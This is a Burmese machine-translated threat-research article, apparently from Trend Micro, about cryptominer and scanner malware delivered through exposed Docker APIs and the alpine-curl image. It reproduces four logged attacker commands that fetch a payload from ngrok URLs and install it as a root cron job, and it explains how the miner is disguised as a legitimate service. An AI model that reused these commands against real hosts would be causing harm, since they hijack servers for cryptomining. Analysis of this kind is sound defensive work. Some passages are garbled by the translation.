မူပိုင်မဟုတ်သော Docker API နှင့် ကွန်မြူနတီမှ အများသူငှာပုံများကို cryptocurrency မိုင်းလုပ်သားများအား ဖြန့်ဝေရန်အတွက် အသုံးပြုနေပုံ

ကျွန်ုပ်တို့သည် ခြိမ်းခြောက်မှုများကို ခြေရာခံရန် ဖန်တီးထားသည့် Honeypot ကွန်တိန်နာများကို အသုံးပြု၍ စုဆောင်းရရှိထားသော အချက်အလက်များကို ပိုင်းခြားစိတ်ဖြာပါသည်။ ထို့အပြင် Docker Hub တွင် ရပ်ရွာမှထုတ်ဝေသောပုံကို အသုံးပြု၍ ညစ်ညမ်းသောကွန်တိန်နာများအဖြစ် ဖြန့်ကျက်ထားသော မလိုလားအပ်သော သို့မဟုတ် ခွင့်ပြုချက်မရှိဘဲ cryptocurrency မိုင်းလုပ်သားများထံမှ သိသာထင်ရှားသောလုပ်ဆောင်ချက်ကို တွေ့ရှိခဲ့သည်။ ရုပ်ပုံအား အန္တရာယ်ရှိသော cryptocurrency မိုင်းလုပ်သားများကို ပို့ဆောင်ပေးသည့် ဝန်ဆောင်မှု၏ တစ်စိတ်တစ်ပိုင်းအဖြစ် အသုံးပြုထားသည်။

ထို့အပြင်၊ အနီးနားရှိ ကွန်တိန်နာများနှင့် အပလီကေးရှင်းများကို ဖောက်ထွင်းဝင်ရောက်ရန်အတွက် ကွန်ရက်များနှင့် လုပ်ဆောင်ရန်အတွက် ပရိုဂရမ်များကို ထည့်သွင်းထားသည်။

လုံခြုံရေးအစီအမံများ သို့မဟုတ် အပိုဆော့ဖ်ဝဲလ်ကို နောက်ဆက်တွဲထည့်သွင်းခြင်းမရှိဘဲ ကျွန်ုပ်တို့၏ ပျားရည်အိုးများကို ပုံသေဆက်တင်များဖြင့် ထားခဲ့သည်။ အမှားအယွင်းများနှင့် ရိုးရှင်းသောအားနည်းချက်များကိုရှောင်ရှားရန် Docker တွင် ကနဦးထည့်သွင်းမှုအတွက် အကြံပြုချက်များရှိကြောင်း ကျေးဇူးပြု၍ သတိပြုပါ။ သို့သော် အသုံးပြုသည့် ပျားရည်အိုးများသည် ကွန်တိန်နာအတွင်းရှိ အပလီကေးရှင်းများမဟုတ်ဘဲ ကွန်တိန်နာအတွင်းရှိ အက်ပ်လီကေးရှင်းများမဟုတ်ဘဲ ကွန်တိန်နာပြုလုပ်သည့်ပလပ်ဖောင်းကို ရည်ရွယ်၍ တိုက်ခိုက်မှုများကို ရှာဖွေရန် ဒီဇိုင်းထုတ်ထားသည့် ကွန်တိန်နာများဖြစ်သည်။

အားနည်းချက်များကို မလိုအပ်ဘဲ Docker ဗားရှင်းနှင့်လည်း ကင်းကွာသောကြောင့် ရှာဖွေတွေ့ရှိထားသော အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်သည် မှတ်သားဖွယ်ကောင်းပါသည်။ မှားယွင်းစွာ ပြင်ဆင်သတ်မှတ်ထားသော ပုံတစ်ပုံအား ရှာဖွေခြင်း နှင့် ဖွင့်ထားသော ကွန်တိန်နာပုံသည် တိုက်ခိုက်သူများသည် ဖွင့်ထားသော ဆာဗာများစွာကို ကူးစက်ရန် လိုအပ်သော အရာများဖြစ်သည်။

မပိတ်ထားသော Docker API သည် သုံးစွဲသူအား ကျယ်ပြန့်စွာ လုပ်ဆောင်နိုင်စေပါသည်။ အသင်းများလုပ်ဆောင်နေသည့် ကွန်တိန်နာစာရင်းကို ရယူခြင်း၊ သတ်မှတ်ထားသော ကွန်တိန်နာတစ်ခုမှ မှတ်တမ်းများရယူခြင်း၊ စတင်ခြင်း၊ ရပ်တန့်ခြင်း (အတင်းအကျပ်ခိုင်းစေခြင်းအပါအဝင်) နှင့် သတ်မှတ်ထားသော ဆက်တင်များဖြင့် သီးခြားပုံတစ်ပုံမှ ကွန်တိန်နာအသစ်တစ်ခု ဖန်တီးခြင်း အပါအဝင်။

ဘယ်ဘက်တွင် malware ပေးပို့မှုနည်းလမ်းဖြစ်သည်။ ညာဘက်တွင် ပုံများကို အဝေးထိန်းစနစ်ဖြင့် လွှင့်ထုတ်နိုင်စေသည့် တိုက်ခိုက်သူ၏ ပတ်ဝန်းကျင်ဖြစ်သည်။

ဖွင့်လှစ်ထားသော Docker APIs 3762 နိုင်ငံအလိုက် ဖြန့်ဖြူးခြင်း။ 12.02.2019/XNUMX/XNUMX ရက်စွဲပါ Shodan ရှာဖွေမှုအပေါ် အခြေခံသည်။

တိုက်ခိုက်မှုကွင်းဆက်နှင့် payload ရွေးချယ်စရာများ

ပျားရည်အိုးများ၏အကူအညီဖြင့်သာမက အန္တရာယ်ရှိသောလုပ်ဆောင်ချက်ကို တွေ့ရှိခဲ့သည်။ Monero cryptocurrency သတ္တုတူးဖော်ရေးဆော့ဖ်ဝဲလ်ကို အသုံးပြုရန် တံတားအဖြစ်အသုံးပြုသော မှားယွင်းဖွဲ့စည်းထားသော ကွန်တိန်နာတစ်ခုကို ကျွန်ုပ်တို့ စုံစမ်းစစ်ဆေးပြီးနောက် ဖော်ထုတ်ထားသည့် Docker API အရေအတွက် (ဒုတိယဂရပ်ကိုကြည့်ပါ) တိုးလာကြောင်း Shodan မှ ဒေတာက ဖော်ပြသည်။ ပြီးခဲ့သည့်နှစ် အောက်တိုဘာလ (2018၊ လက်ရှိဒေတာ သင်ဤကဲ့သို့ကြည့်နိုင်သည်။ အနီးစပ်ဆုံး ဘာသာပြန်သူ) ဖွင့်ထားသော API 856 ခုသာရှိခဲ့သည်။

Honeypot မှတ်တမ်းများကို စစ်ဆေးမှုတွင် ကွန်တိန်နာပုံအသုံးပြုမှုသည် အသုံးပြုမှုနှင့် ဆက်စပ်နေကြောင်း ပြသခဲ့သည်။ ငရုတ်လုံခြုံသောချိတ်ဆက်မှုများကို ထူထောင်ခြင်း သို့မဟုတ် အများသူငှာဝင်ရောက်နိုင်သောနေရာများမှ သတ်မှတ်ထားသောလိပ်စာများ သို့မဟုတ် အရင်းအမြစ်များဆီသို့ အသွားအလာကို ထပ်ဆင့်ပို့ခြင်းအတွက် ကိရိယာတစ်ခု (ဥပမာ localhost)။ ၎င်းသည် တိုက်ခိုက်သူများသည် ဖွင့်ထားသောဆာဗာသို့ payload ပေးပို့သောအခါတွင် ဒိုင်နမစ် URL များကို ဖန်တီးနိုင်စေပါသည်။ အောက်ပါတို့သည် ngrok ဝန်ဆောင်မှုကို အလွဲသုံးစားလုပ်ခြင်းကို ပြသသည့် မှတ်တမ်းများမှ ကုဒ်နမူနာများဖြစ်သည်-

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

သင်တွေ့မြင်ရသည့်အတိုင်း၊ အပ်လုဒ်လုပ်ထားသောဖိုင်များကို အဆက်မပြတ်ပြောင်းလဲနေသော URL များမှ ဒေါင်းလုဒ်လုပ်ပါသည်။ ဤ URL များသည် သက်တမ်းတို ရက်စွဲတစ်ခု ရှိသည်၊ ထို့ကြောင့် သက်တမ်းကုန်ဆုံးရက်ပြီးနောက် payload များကို ဒေါင်းလုဒ်လုပ်၍ မရပါ။

payload option နှစ်ခုရှိသည်။ ပထမတစ်ခုသည် သတ္တုတွင်းရေကန်သို့ ချိတ်ဆက်ပေးသည့် Coinminer.SH.MALXMR.ATNO (အဖြစ် သတ်မှတ်ထားသော Linux အတွက် စုစည်းထားသော ELF သတ္တုတွင်းသမား) ဖြစ်သည်။ ဒုတိယမှာ ကွန်ရက်အကွာအဝေးများကို စကင်န်ဖတ်ပြီး ပစ်မှတ်အသစ်များကို ရှာဖွေရန် အသုံးပြုသည့် ကွန်ရက်ကိရိယာအချို့ကို ရယူရန် ဒီဇိုင်းထုတ်ထားသည့် script (TrojanSpy.SH.ZNETMAP.A) ဖြစ်သည်။

dropper script သည် cryptocurrency miner ကိုအသုံးပြုရန်အတွက် variable နှစ်ခုကိုသတ်မှတ်ပေးသည်။ HOST variable တွင် အန္တရာယ်ရှိသောဖိုင်များ တည်ရှိရာ URL ပါ၀င်ပြီး RIP variable သည် အသုံးချမည့် miner ၏ ဖိုင်အမည် (အမှန်အားဖြင့် hash) ဖြစ်သည်။ hash variable ပြောင်းတိုင်း HOST variable သည် ပြောင်းလဲသည်။ script သည် တိုက်ခိုက်ခံရသော ဆာဗာတွင် အခြား cryptocurrency miner များ လုပ်ဆောင်ခြင်းမရှိကြောင်းကိုလည်း စစ်ဆေးရန်ကြိုးစားပါသည်။

HOST နှင့် RIP variable များ ဥပမာများအပြင် အခြားမိုင်းတွင်းလုပ်သားများ လုပ်ဆောင်ခြင်းမရှိကြောင်း စစ်ဆေးရန် အသုံးပြုသည့် ကုဒ်အတိုအထွာများ

သတ္တုတွင်းလုပ်ငန်းကို မစတင်မီ၊ ၎င်းကို nginx ဟု အမည်ပြောင်းထားသည်။ ဤ script ၏ အခြားဗားရှင်းများသည် သတ္တုတွင်းတူးသူကို Linux ပတ်ဝန်းကျင်တွင် ရှိနေနိုင်သည့် အခြားတရားဝင်ဝန်ဆောင်မှုများသို့ အမည်ပြောင်းပါ။ ၎င်းသည် ပုံမှန်အားဖြင့် လုပ်ဆောင်နေသည့် လုပ်ငန်းစဉ်များစာရင်းအား စစ်ဆေးမှုများကို ကျော်ဖြတ်ရန် လုံလောက်ပါသည်။

ရှာဖွေရေး Script တွင်လည်း အင်္ဂါရပ်များ ပါရှိသည်။ ၎င်းသည် လိုအပ်သောကိရိယာများကို အသုံးပြုရန် တူညီသော URL ဝန်ဆောင်မှုဖြင့် အလုပ်လုပ်ပါသည်။ ၎င်းတို့ထဲတွင် ကွန်ရက်များကို စကင်န်ဖတ်ကာ ဖွင့်ထားသော ဆိပ်ကမ်းများစာရင်းကို ရယူရန် အသုံးပြုသည့် zmap binary ဖြစ်သည်။ script သည် တွေ့ရှိသောဝန်ဆောင်မှုများနှင့် အပြန်အလှန်တုံ့ပြန်ရန်အသုံးပြုသည့် အခြားသော binary ကိုတင်ပြီး တွေ့ရှိသောဝန်ဆောင်မှုနှင့်ပတ်သက်သည့် နောက်ထပ်အချက်အလက်များကိုဆုံးဖြတ်ရန် ၎င်းတို့ထံမှနဖူးစည်းများကိုလက်ခံရရှိသည် (ဥပမာ၊ ၎င်း၏ဗားရှင်း)။

script သည် စကင်န်ဖတ်ရန် ကွန်ရက်အပိုင်းအခြားအချို့ကိုလည်း ကြိုတင်သတ်မှတ်ပေးသည်၊ သို့သော် ၎င်းသည် script ၏ဗားရှင်းပေါ်တွင်မူတည်ပါသည်။ စကင်န်မလုပ်ဆောင်မီ Docker သည် ဝန်ဆောင်မှုများမှ ပစ်မှတ်များကို သတ်မှတ်ပေးသည်။

ဖြစ်နိုင်သမျှ ပစ်မှတ်များကို အမြန်ဆုံးတွေ့ရှိပါက နဖူးစည်းများကို ၎င်းတို့ထံမှ အလိုအလျောက် ဖယ်ရှားပါသည်။ ဇာတ်ညွှန်းသည် ဝန်ဆောင်မှုများ၊ အပလီကေးရှင်းများ၊ အစိတ်အပိုင်းများ သို့မဟုတ် စိတ်ဝင်စားဖွယ်ပလက်ဖောင်းများပေါ် မူတည်၍ ပစ်မှတ်များကို စစ်ထုတ်သည်- Redis၊ Jenkins၊ Drupal၊ MODX၊ Kubernetes မာစတာDocker 1.16 client နှင့် Apache CouchDB။ စကင်န်ဖတ်ထားသော ဆာဗာသည် ၎င်းတို့နှင့် ကိုက်ညီပါက၊ ၎င်းကို တိုက်ခိုက်သူများသည် နောက်ပိုင်းတွင် ခွဲခြမ်းစိတ်ဖြာခြင်းနှင့် ဟက်ကာများအတွက် နောက်ပိုင်းတွင် အသုံးပြုနိုင်သည့် စာသားဖိုင်တွင် သိမ်းဆည်းထားသည်။ ဤစာသားဖိုင်များကို dynamic လင့်ခ်များမှတစ်ဆင့် တိုက်ခိုက်သူများ၏ဆာဗာများသို့ အပ်လုဒ်လုပ်ထားသည်။ ဆိုလိုသည်မှာ၊ ဖိုင်တစ်ခုစီအတွက် သီးခြား URL ကိုအသုံးပြုသည်၊ ဆိုလိုသည်မှာ နောက်ဆက်တွဲဝင်ရောက်ရန်ခက်ခဲသည်။

တိုက်ခိုက်မှု vector သည် နောက်ကုဒ်နှစ်ခုတွင်တွေ့နိုင်သကဲ့သို့ Docker ပုံဖြစ်သည်။

ထိပ်တွင်တရားဝင်ဝန်ဆောင်မှုတစ်ခုအဖြစ် အမည်ပြောင်းထားပြီး အောက်ခြေတွင် ကွန်ရက်များကိုစကင်န်ဖတ်ရန် zmap ကိုအသုံးပြုပုံဖြစ်သည်။

ထိပ်တွင် ကြိုတင်သတ်မှတ်ထားသော ကွန်ရက်အပိုင်းအခြားများရှိပြီး အောက်ခြေတွင် Docker အပါအဝင် ဝန်ဆောင်မှုများကို ရှာဖွေရန်အတွက် သီးခြားဆိပ်ကမ်းများဖြစ်သည်။

ဖန်သားပြင်ဓာတ်ပုံတွင် alpine-curl ရုပ်ပုံကို အကြိမ် 10 သန်းကျော် ဒေါင်းလုဒ်လုပ်ထားကြောင်း ပြသထားသည်။

အမျိုးမျိုးသော ပရိုတိုကောများမှတဆင့် ဖိုင်များလွှဲပြောင်းခြင်းအတွက် အရင်းအမြစ်-ထိရောက်သော CLI ကိရိယာဖြစ်သည့် Alpine Linux နှင့် curl ကို အခြေခံ၍ သင်တည်ဆောက်နိုင်သည်။ Docker ပုံ. ယခင်ပုံတွင်မြင်ရသည့်အတိုင်း၊ ဤပုံကို အကြိမ်ရေ 10 သန်းကျော်ဒေါင်းလုဒ်လုပ်ထားပြီးဖြစ်သည်။ ဒေါင်းလုဒ်အများအပြားသည် ဤပုံကို အဝင်မှတ်တစ်ခုအဖြစ် အသုံးပြုခြင်းဟု ဆိုလိုခြင်း ဖြစ်နိုင်သည်၊ ဤပုံကို လွန်ခဲ့သော ခြောက်လကျော်က အပ်ဒိတ်လုပ်ခဲ့သည်၊ အသုံးပြုသူများသည် ဤသိုလှောင်ခန်းမှ အခြားပုံများကို မကြာခဏ ဒေါင်းလုဒ်မလုပ်ခဲ့ကြပါ။ Docker တွင် ဝင်ပေါက်အမှတ် - ၎င်းကို run ရန် container တစ်ခုကို configure လုပ်ရန်အသုံးပြုသော ညွှန်ကြားချက်အစုံ။ ဝင်ခွင့်အမှတ် ဆက်တင်များ မှားယွင်းနေပါက (ဥပမာ၊ ကွန်တိန်နာကို အင်တာနက်မှ ဖွင့်ထားခဲ့သည်)၊ ပုံအား တိုက်ခိုက်မှု vector အဖြစ် အသုံးပြုနိုင်သည်။ သတ်မှတ်ပုံမမှန်သော သို့မဟုတ် ပံ့ပိုးမထားသည့် ကွန်တိန်နာကို ဖွင့်ထားသည်ကို တွေ့ရှိပါက တိုက်ခိုက်သူများသည် payload တစ်ခုကို ပို့ဆောင်ရန် ၎င်းကို အသုံးပြုနိုင်သည်။

ဤပုံ (alpine-curl) ကိုယ်တိုင်က အန္တရာယ်မဟုတ်ကြောင်း သတိပြုရန် အရေးကြီးပါသည်၊ သို့သော် အထက်တွင်မြင်ရသည့်အတိုင်း၊ ၎င်းကို အန္တရာယ်ရှိသော လုပ်ဆောင်ချက်များကို လုပ်ဆောင်ရန် အသုံးပြုနိုင်သည်။ အလားတူ Docker ပုံများကို အန္တရာယ်ရှိသော လုပ်ဆောင်မှုများ လုပ်ဆောင်ရန်လည်း အသုံးပြုနိုင်သည်။ ကျွန်ုပ်တို့ Docker ကို ဆက်သွယ်ခဲ့ပြီး ဤပြဿနာအတွက် ၎င်းတို့နှင့် လုပ်ဆောင်ခဲ့သည်။

အကြံပြုချက်များ

ဆက်တင် မမှန်ပါ။ အကြွင်း အဆက်မပြတ်ပြဿနာ အထူးသဖြင့် အကောင်ထည်ဖော်တဲ့ ကုမ္ပဏီတော်တော်များများအတွက်ပါ။ DevOpsလျင်မြန်သောဖွံ့ဖြိုးတိုးတက်မှုနှင့် ပေးပို့မှုအပေါ် အာရုံစိုက်ပါ။ စာရင်းစစ်ခြင်းနှင့် စောင့်ကြည့်ခြင်း စည်းမျဉ်းများကို လိုက်နာရန် လိုအပ်ခြင်း၊ ဒေတာ လျှို့ဝှက်ထားမှုကို စောင့်ကြည့်ရန် လိုအပ်ခြင်းနှင့် ၎င်းတို့၏ မလိုက်နာခြင်းမှ ကြီးမားသော ပျက်စီးဆုံးရှုံးမှုများကြောင့် အရာအားလုံး ပိုမိုဆိုးရွားလာပါသည်။ ဖွံ့ဖြိုးတိုးတက်မှုဘဝစက်ဝန်းတွင် လုံခြုံရေးအလိုအလျောက်စနစ်ထည့်သွင်းခြင်းဖြင့် တစ်ဖက်တစ်လမ်းမှ မတွေ့နိုင်သည့် လုံခြုံရေးအပေါက်များကို ရှာဖွေပေးရုံသာမက ရှာဖွေတွေ့ရှိထားသည့် အားနည်းချက်တစ်ခုစီအတွက် အပိုဆော့ဖ်ဝဲတည်ဆောက်မှုများ လုပ်ဆောင်ခြင်းကဲ့သို့သော မလိုအပ်သောအလုပ်များကို လျှော့ချပေးနိုင်သည်။

ဤဆောင်းပါးတွင် ဆွေးနွေးထားသော အဖြစ်အပျက်သည် အောက်ပါ အကြံပြုချက်များ အပါအဝင် ဘေးကင်းရေးကို အစကတည်းက ထည့်သွင်းစဉ်းစားရန် လိုအပ်ကြောင်း မီးမောင်းထိုးပြသည်-

• စနစ်စီမံခန့်ခွဲသူများနှင့် ဆော့ဖ်ဝဲအင်ဂျင်နီယာများအတွက်- တိကျသောဆာဗာ သို့မဟုတ် အတွင်းကွန်ရက်မှ တောင်းဆိုချက်များကိုသာ လက်ခံရန် အရာအားလုံးကို စီစဉ်သတ်မှတ်ထားကြောင်း သေချာစေရန် သင်၏ API ဆက်တင်များကို အမြဲစစ်ဆေးပါ။
• အနည်းဆုံးအခွင့်အရေး၏ နိယာမကို လိုက်နာပါ- ကွန်တိန်နာပုံများကို လက်မှတ်ရေးထိုးပြီး အတည်ပြုကြောင်း သေချာစေရန်၊ အရေးကြီးသော အစိတ်အပိုင်းများ (ကွန်တိန်နာစတင်ခြင်းဝန်ဆောင်မှု) သို့ ဝင်ရောက်ခွင့်ကို ကန့်သတ်ပြီး ကွန်ရက်ချိတ်ဆက်မှုများတွင် ကုဒ်နံပါတ်ထည့်ပါ။
• လိုက်နာပါ။ အကြံပြုချက်များ လုံခြုံရေး ယန္တရားများကို ဖွင့်ပါ၊ ဥပမာ၊ Docker မှ နှင့် built-in လုံခြုံရေးအင်္ဂါရပ်များ.
• ကွန်တိန်နာအတွင်း လုပ်ဆောင်နေသည့် လုပ်ငန်းစဉ်များအကြောင်း နောက်ထပ်အချက်အလက်များကို ရယူရန် runtime နှင့် ပုံများကို အလိုအလျောက်စကင်န်ဖတ်ခြင်းကို အသုံးပြုပါ (ဥပမာ၊ အတုအယောင် သို့မဟုတ် အားနည်းချက်များကို ရှာဖွေရန်)။ အပလီကေးရှင်းထိန်းချုပ်မှုနှင့် သမာဓိစောင့်ကြပ်ခြင်းတို့သည် ဆာဗာများ၊ ဖိုင်များနှင့် စနစ်ဧရိယာများသို့ ပုံမှန်မဟုတ်သောပြောင်းလဲမှုများကို ခြေရာခံရန် ကူညီပေးပါသည်။

Trendmicro သည် DevOps အဖွဲ့များကို လုံခြုံစွာတည်ဆောက်ရန်၊ လျင်မြန်စွာထွက်ပြီး မည်သည့်နေရာတွင်မဆို စတင်ရန် ကူညီပေးသည်။ Trend Micro Hybrid Cloud Security အဖွဲ့အစည်းတစ်ခု၏ DevOps ပိုက်လိုင်းတစ်လျှောက် အားကောင်းသော၊ ချောမွေ့ပြီး အလိုအလျောက်လုံခြုံရေးကို ပေးဆောင်ပြီး ခြိမ်းခြောက်မှုအများအပြားကို အကာအကွယ်ပေးသည် XGen runtime တွင် ရုပ်ပိုင်းဆိုင်ရာ၊ virtual နှင့် cloud workloads များကို ကာကွယ်ရန်။ ၎င်းသည် ကွန်တိန်နာလုံခြုံရေးကိုလည်း ထည့်သွင်းထားသည်။ နက်ရှိုင်းသောလုံခြုံရေး и Deep Security Smart Check၎င်းတို့ကို အသုံးမပြုမီ ခြိမ်းခြောက်မှုများကို တားဆီးရန် ဖွံ့ဖြိုးတိုးတက်ရေးပိုက်လိုင်းရှိ မည်သည့်နေရာတွင်မဆို မဲလ်ဝဲနှင့် အားနည်းချက်များအတွက် Docker ကွန်တိန်နာပုံများကို စကင်န်ဖတ်သည်။

အလျှော့အတင်း လက္ခဏာများ

ဆက်စပ် hashe များ-

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

အပေါ် Docker ဗီဒီယိုသင်တန်း ဖြစ်နိုင်ခြေကို အနည်းဆုံးဖြစ်စေရန် သို့မဟုတ် အထက်တွင်ဖော်ပြထားသည့် အခြေအနေမျိုး လုံးဝရှောင်ရှားနိုင်ရန် လေ့ကျင့်ရေးစပီကာများက မည်သည့်ဆက်တင်များကို ပြုလုပ်ရမည်ကို ပြသသည်။ ဩဂုတ်လ ၁၉-၂၁ ရက် တွင် အွန်လိုင်းအကြိတ်အနယ် DevOps ကိရိယာများနှင့် လှည့်စားမှုများ ဤကဲ့သို့သော အလားတူ လုံခြုံရေးပြဿနာများကို လုပ်ဖော်ကိုင်ဖက်များနှင့် လေ့ကျင့်သင်ကြားပေးနေသော ဆရာများနှင့် ဆွေးနွေးနိုင်ပြီး၊ လူတိုင်းသည် အတွေ့အကြုံရှိ လုပ်ဖော်ကိုင်ဖက်များ၏ နာကျင်မှုများနှင့် အောင်မြင်မှုများကို နားထောင်နိုင်သည့် စားပွဲဝိုင်းတွင် ဆွေးနွေးနိုင်ပါသည်။

source: www.habr.com